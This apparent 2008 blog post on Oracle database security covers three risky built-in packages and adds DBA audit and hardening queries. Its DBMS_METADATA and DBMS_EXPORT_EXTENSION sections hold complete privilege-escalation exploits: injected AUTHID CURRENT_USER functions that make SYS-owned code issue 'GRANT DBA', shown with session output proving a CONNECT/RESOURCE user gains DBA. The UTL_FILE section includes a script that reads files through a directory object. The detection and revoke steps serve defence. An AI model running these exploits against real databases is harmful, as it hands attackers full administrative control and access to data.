Yaping's Weblog

September 2, 2008

Vulnerable Packages

Filed under: Oracle — Yaping @ 2:34 am

I'll list several frequently used Oracle packages that are dangerous when exposed: one gives file-system access, the other two give a low-privileged user a path to DBA.

Utl_file
UTL_FILE lets PL/SQL read and write operating-system files from inside the database, and PUBLIC has EXECUTE on it by default. A user who holds nothing more than CREATE SESSION plus READ/WRITE on a directory object, or who is on an instance where the utl_file_dir parameter is set (that parameter opens its paths to every user who can execute UTL_FILE, and a value of '*' opens everything), can read or write any file in those locations that the oracle OS account itself can reach. An attacker can use this to read sensitive data (anything the oracle account can read, database files included) or to overwrite files and destroy the whole database.
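As an added example (not from the original post), here is how a DBA would measure the UTL_FILE exposure just described, what a user with only CREATE SESSION and one directory grant can do with it, and the hardening step. The dictionary views, the parameter and the UTL_FILE calls are standard Oracle; the directory DATA_PUMP_DIR, the file listener.log and the grantee APP_OWNER are assumed names for the illustration.

```sql
-- Added example, not from the original post: how a DBA measures the UTL_FILE
-- exposure described above, what a low-privileged user can do with it, and
-- the hardening step. Dictionary views, parameters and UTL_FILE calls are
-- standard Oracle; DATA_PUMP_DIR, listener.log and APP_OWNER are assumed
-- names for this illustration.

-- 1. Is the package executable by everyone? (Default: PUBLIC has EXECUTE.)
SELECT grantee, privilege
  FROM dba_tab_privs
 WHERE owner = 'SYS'
   AND table_name = 'UTL_FILE';

-- 2. Legacy path list. Any value here is reachable by every user who can
--    execute UTL_FILE, with no directory grant needed; '*' means the entire
--    file system the oracle OS account can touch.
SELECT name, value
  FROM v$parameter
 WHERE name = 'utl_file_dir';

-- 3. Directory objects and who holds READ/WRITE on each. Directory
--    privileges are recorded in DBA_TAB_PRIVS under owner SYS.
SELECT d.directory_name, d.directory_path, p.grantee, p.privilege
  FROM dba_directories d
  LEFT JOIN dba_tab_privs p
    ON p.owner = 'SYS'
   AND p.table_name = d.directory_name
 ORDER BY d.directory_name, p.grantee;

-- 4. What CREATE SESSION plus READ on one directory buys an attacker: every
--    file in that directory the oracle account can read, dumped line by line.
--    (Directory and file name are assumptions.)
SET SERVEROUTPUT ON
DECLARE
  fh   UTL_FILE.FILE_TYPE;
  line VARCHAR2(32767);
BEGIN
  fh := UTL_FILE.FOPEN('DATA_PUMP_DIR', 'listener.log', 'r', 32767);
  LOOP
    UTL_FILE.GET_LINE(fh, line);     -- raises NO_DATA_FOUND at end of file
    DBMS_OUTPUT.PUT_LINE(line);
  END LOOP;
EXCEPTION
  WHEN NO_DATA_FOUND THEN
    UTL_FILE.FCLOSE(fh);
  WHEN OTHERS THEN
    IF UTL_FILE.IS_OPEN(fh) THEN
      UTL_FILE.FCLOSE(fh);
    END IF;
    RAISE;
END;
/

-- 5. Hardening: take EXECUTE away from PUBLIC and grant it only to the
--    schemas that need it (APP_OWNER is an assumed name), then re-check step 1.
REVOKE EXECUTE ON utl_file FROM PUBLIC;
GRANT EXECUTE ON utl_file TO app_owner;
```

Run steps 1 to 3 and 5 as a DBA; step 4 is what the low-privileged user runs. Before revoking from PUBLIC, list the schemas that reference the package (DBA_DEPENDENCIES with REFERENCED_NAME = 'UTL_FILE') so the grants in step 5 cover them: a revoke invalidates dependent objects whose owners lose access.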

Dbms_metadata
Input passed to the OBJECT_TYPE parameter of several DBMS_METADATA procedures (GET_DDL among them) is not properly sanitised and can be used to inject arbitrary SQL into the queries the package builds. Unpatched 9i and 10g releases are affected. Because DBMS_METADATA is owned by SYS and runs with definer's rights, a function injected into that query is called as SYS; declaring the function AUTHID CURRENT_USER makes the dynamic GRANT inside it run with SYS's privileges, and PRAGMA AUTONOMOUS_TRANSACTION lets it commit from inside a SELECT. The GET_DDL call below fails with ORA-31600, but the injected function has already run: after reconnecting, TEST holds DBA.

@>conn test/test
Connected.
@>select * from session_roles;
ROLE
------------------------------
RESOURCE
CONNECT
PLUSTRACE

@>create or replace function get_dba
    return varchar2
    authid current_user is          -- invoked from SYS-owned code, so the current user is SYS
    pragma autonomous_transaction;  -- lets the GRANT commit inside a SELECT
    begin
      execute immediate 'grant dba to public';
      commit;
      return '';
    end;
  /
Function created.

@>select dbms_metadata.get_ddl('''||test.get_dba()||''','') from dual;
ERROR:
ORA-31600: invalid input value '||test.get_dba()||' for parameter OBJECT_TYPE in function GET_DDL
ORA-06512: at "SYS.DBMS_SYS_ERROR", line 105
ORA-06512: at "SYS.DBMS_METADATA_INT", line 1536
ORA-06512: at "SYS.DBMS_METADATA_INT", line 1900
ORA-06512: at "SYS.DBMS_METADATA_INT", line 3606
ORA-06512: at "SYS.DBMS_METADATA", line 504
ORA-06512: at "SYS.DBMS_METADATA", line 560
ORA-06512: at "SYS.DBMS_METADATA", line 1221
ORA-06512: at line 1
no rows selected

@>conn test/test
Connected.
@>select * from session_roles;
ROLE
------------------------------
DBA
SELECT_CATALOG_ROLE
HS_ADMIN_ROLE
EXECUTE_CATALOG_ROLE
DELETE_CATALOG_ROLE
EXP_FULL_DATABASE
IMP_FULL_DATABASE
GATHER_SYSTEM_STATISTICS
PLUSTRACE
RESOURCE
CONNECT
11 rows selected.

DBMS_EXPORT_EXTENSION
This package is used by the export utility (exp); before 10gR2, PUBLIC has EXECUTE on it by default. GET_DOMAIN_INDEX_METADATA runs with SYS's definer's rights and calls the ODCIIndexGetMetadata function of whatever TYPE_SCHEMA.TYPE_NAME it is handed, so a user who can create a package in their own schema (CREATE PROCEDURE comes with the RESOURCE role) can have SYS call it. With that package declared AUTHID CURRENT_USER, the GRANT inside runs with SYS's privileges. Because the grant happens during the current session, the new role must be enabled with set role (or a fresh login) before it shows up in session_roles.

@>conn test/test
Connected.
@>select * from session_roles;
ROLE
------------------------------
RESOURCE
CONNECT
PLUSTRACE

@>CREATE OR REPLACE PACKAGE MYTESTPKG
  AUTHID CURRENT_USER
  IS
    FUNCTION ODCIIndexGetMetadata(oindexinfo SYS.odciindexinfo, P3 VARCHAR2, p4 VARCHAR2, env SYS.odcienv)
    RETURN NUMBER;
  END;
  /
Package created.

@>CREATE OR REPLACE PACKAGE BODY MYTESTPKG
  IS
    -- Signature matches what GET_DOMAIN_INDEX_METADATA expects of an
    -- indextype implementation. SYS calls it, and because the package is
    -- AUTHID CURRENT_USER the GRANT below runs with SYS's privileges.
    FUNCTION ODCIIndexGetMetadata(oindexinfo SYS.odciindexinfo, P3 VARCHAR2, p4 VARCHAR2, env SYS.odcienv)
    RETURN NUMBER
  IS
    pragma autonomous_transaction;  -- commit independently of the caller
  BEGIN
    EXECUTE IMMEDIATE 'GRANT DBA TO TEST';
    COMMIT;
    RETURN(1);
  END;

  END;
  /
Package body created.

@>DECLARE
    V_INDEX_NAME   VARCHAR2(200);
    V_INDEX_SCHEMA VARCHAR2(200);
    V_TYPE_NAME    VARCHAR2(200);
    V_TYPE_SCHEMA  VARCHAR2(200);
    V_VERSION      VARCHAR2(200);
    V_NEWBLOCK     PLS_INTEGER;
    V_GMFLAGS      NUMBER;
    v_Return       VARCHAR2(200);
  BEGIN
    V_INDEX_NAME   := 'A1';         -- arbitrary index name
    V_INDEX_SCHEMA := 'TEST';
    V_TYPE_NAME    := 'MYTESTPKG';  -- the package above, which SYS will call
    V_TYPE_SCHEMA  := 'TEST';
    V_VERSION      := '9.2.0.4.0';
    V_GMFLAGS      := 1;

    v_Return := SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_METADATA(
                  INDEX_NAME => V_INDEX_NAME, INDEX_SCHEMA => V_INDEX_SCHEMA,
                  TYPE_NAME => V_TYPE_NAME, TYPE_SCHEMA => V_TYPE_SCHEMA,
                  VERSION => V_VERSION, NEWBLOCK => V_NEWBLOCK, GMFLAGS => V_GMFLAGS);
  END;
  /
PL/SQL procedure successfully completed.

@>set role dba;
Role set.
@>select * from session_roles;
ROLE
------------------------------
DBA
SELECT_CATALOG_ROLE
HS_ADMIN_ROLE
EXECUTE_CATALOG_ROLE
DELETE_CATALOG_ROLE
EXP_FULL_DATABASE
IMP_FULL_DATABASE
GATHER_SYSTEM_STATISTICS
PLUSTRACE
9 rows selected.
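As an added example (not from the original post), the checks a DBA would run against the two escalation paths shown in the Dbms_metadata and DBMS_EXPORT_EXTENSION sections: which of the packages PUBLIC can still execute, who currently holds DBA, where callback units of the kind used above live, and how to record future grants. The views and audit statements are standard Oracle; the allow-list of DBA holders in step 2 is an assumption to adjust per site.

```sql
-- Added example, not from the original post: checks a DBA can run against
-- the two escalation paths shown in the DBMS_METADATA and
-- DBMS_EXPORT_EXTENSION sections. Views and audit statements are standard
-- Oracle; the allow-list in step 2 is an assumption to adjust per site.

-- 1. Which of the packages discussed here can PUBLIC still execute?
SELECT table_name, grantee, privilege
  FROM dba_tab_privs
 WHERE owner = 'SYS'
   AND grantee = 'PUBLIC'
   AND table_name IN ('UTL_FILE', 'DBMS_METADATA', 'DBMS_EXPORT_EXTENSION');

-- 2. Who holds DBA? Both exploits end with "GRANT DBA TO PUBLIC" or
--    "GRANT DBA TO TEST"; anything outside the allow-list needs an owner.
SELECT grantee, admin_option, default_role
  FROM dba_role_privs
 WHERE granted_role = 'DBA'
   AND grantee NOT IN ('SYS', 'SYSTEM')      -- assumed allow-list
 ORDER BY grantee;

-- 3. Both payloads are AUTHID CURRENT_USER units in a non-privileged schema
--    that issue a GRANT through EXECUTE IMMEDIATE. List units whose spec or
--    body carries all three markers (spec and body share OWNER and NAME).
SELECT owner, name
  FROM dba_source
 WHERE owner NOT IN ('SYS', 'SYSTEM')
 GROUP BY owner, name
HAVING MAX(CASE WHEN UPPER(text) LIKE '%AUTHID%CURRENT_USER%' THEN 1 ELSE 0 END) = 1
   AND MAX(CASE WHEN UPPER(text) LIKE '%EXECUTE IMMEDIATE%'   THEN 1 ELSE 0 END) = 1
   AND MAX(CASE WHEN UPPER(text) LIKE '%GRANT%'               THEN 1 ELSE 0 END) = 1;

-- 4. Record future role and system-privilege grants (needs audit_trail=DB)
--    and review them. The grants above are issued from inside SYS-owned
--    code, so treat step 2 as the ground truth and this trail as a supplement.
AUDIT SYSTEM GRANT BY ACCESS;

SELECT username, os_username, timestamp, action_name, obj_name, returncode
  FROM dba_audit_trail
 WHERE action_name LIKE '%GRANT%'
 ORDER BY timestamp DESC;
```

Run as a DBA. Step 3 is a triage query and will also list legitimate code; the hits worth reading are AUTHID CURRENT_USER units in schemas that hold only RESOURCE and CONNECT, which is exactly where TEST starts above (RESOURCE carries CREATE PROCEDURE, which is all either exploit needs to stage its callback). On releases where the fix is available, patching is the remedy; revoking EXECUTE on DBMS_EXPORT_EXTENSION from PUBLIC is a stopgap that can break exp for non-DBA users.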
